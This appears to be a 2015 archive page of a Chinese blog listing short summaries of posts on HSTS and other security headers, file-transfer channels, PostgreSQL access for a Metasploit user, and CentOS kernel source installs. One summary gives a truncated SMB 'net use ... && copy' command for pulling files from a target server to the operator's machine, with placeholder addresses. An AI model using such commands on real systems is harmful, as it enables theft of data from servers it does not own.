12 2015 档案

一些安全相关的HTTP响应头
摘要:现代浏览器提供了一些安全相关的响应头,使用这些响应头一般只需要修改服务器配置即可,不需要修改程序代码,成本很低。本文介绍一些这样的响应头: 1. Strict-Transport-Security HTTP Strict Transport Security,简称为HSTS。它允许一个HTTPS网站 阅读全文

posted @ 2015-12-30 15:28 szllq2000 阅读(272) 评论(0) 推荐(0)

netcat/curl/wget/smb/icmp ping -p/dns/telnet
摘要:通过SMB协议,在目标服务器和主机之间建立网络共享连接,然后将目标服务器上的文件做分享,接着就可以在主机端将分享的文件copy下来啦。操作的命令如下,netuseh:\\xxx.xxx.xxx.xxx\web/user:{username}{password}&&copy{FiletoCopy}h:... 阅读全文

posted @ 2015-12-25 10:32 szllq2000 阅读(510) 评论(0) 推荐(0)

postgresql
摘要:Allowing password authentication to access postgres on localhostAllow the possibility for account msf_user to use password based authentication to con... 阅读全文

posted @ 2015-12-23 14:40 szllq2000 阅读(275) 评论(0) 推荐(0)

centos source install
摘要:CentOS Kernel Source InstallMar 12th, 2012 |CommentsCentOS kernel source install, first off if you are just trying to build something or compile a too... 阅读全文

posted @ 2015-12-19 12:59 szllq2000 阅读(396) 评论(0) 推荐(0)